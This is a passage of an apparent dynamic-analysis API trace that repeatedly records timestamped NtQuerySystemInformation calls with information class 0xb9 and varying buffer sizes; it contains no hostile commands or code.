SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0270.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0270.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0271.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0271.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0271.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.022] NtQuerySystemInformation 